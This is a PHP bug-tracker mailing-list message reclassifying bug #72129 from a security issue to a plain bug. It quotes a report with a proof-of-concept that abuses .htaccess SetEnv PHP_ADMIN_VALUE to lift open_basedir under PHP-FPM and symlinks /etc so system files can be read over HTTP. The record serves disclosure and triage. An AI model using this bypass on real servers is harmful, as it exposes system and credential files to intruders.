Sec Bug->Bug #72129 [Opn]: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess

From: Date: Mon, 12 Jul 2021 16:05:30 +0000
Subject: Sec Bug->Bug #72129 [Opn]: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-234984@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=72129&edit=1 ID: 72129 Updated by: cmb@php.net Reported by: ouroboros_17 at hotmail dot com Summary: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess Status: Open -Type: Security +Type: Bug Package: FPM related Operating System: Debian (all Linux distributions) PHP Version: 5.6.21 Block user comment: N Private report: Y New Comment: > but if he can upload a .htaccess in the www folder, he can break > open_basedir restrictions open_basedir bypasses are not considered to be security issues; cf. <https://externals.io/message/105606> and <https://externals.io/message/115406>. Besides that the possibility to upload a .htaccess to the web root would be a serious issue of the application. > /var/www/index.php > ------------------ > <?php symlink('/etc', 'foo'); This code looks obviously malicious, so is not a security issue according to <https://wiki.php.net/security#not_a_security_issue>. Previous Comments: ------------------------------------------------------------------------ [2016-04-29 15:46:15] ouroboros_17 at hotmail dot com Description: ------------ It is possible, for a malicious user, to change PHP configuration with a .htaccess file on Apache with PHP-FPM. It is not something trivial, but if he can upload a .htaccess in the www folder, he can break open_basedir restrictions (see example below). This behaviour can be fixed: - AllowOverride None in Apache configuration (a good practice but it is not really usual in the real world) - prevent upload of .htaccess (application side, not related with PHP-FPM) - disable mod_env PHP as a module of Apache cannot be affected because only php_value can be set in .htaccess. It should be documented at least, or it should be possible to disable the hability to set configuration via environment variables. See bug #3991 too. Test script: --------------- Apache vhost ------------------ DocumentRoot /var/www <Directory /var/www/> AllowOverride All <FilesMatch \.php$> SetHandler "proxy:unix:/var/run/php5-fpm.sock|fcgi://localhost/" </FilesMatch> </Directory> /var/www/.htaccess ------------------ Options +FollowSymLinks -SymLinksIfOwnerMatch SetEnv PHP_ADMIN_VALUE "open_basedir=/" /var/www/index.php ------------------ <?php symlink('/etc', 'foo'); PHP-FPM pool ------------------ [...] php_admin_value[open_basedir] = /var/www Access "index.php" with HTTP so it creates the symlink, see files in /etc via the http://example.com/foo URI. ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=72129&edit=1

« previous php.bugs (#234984) next »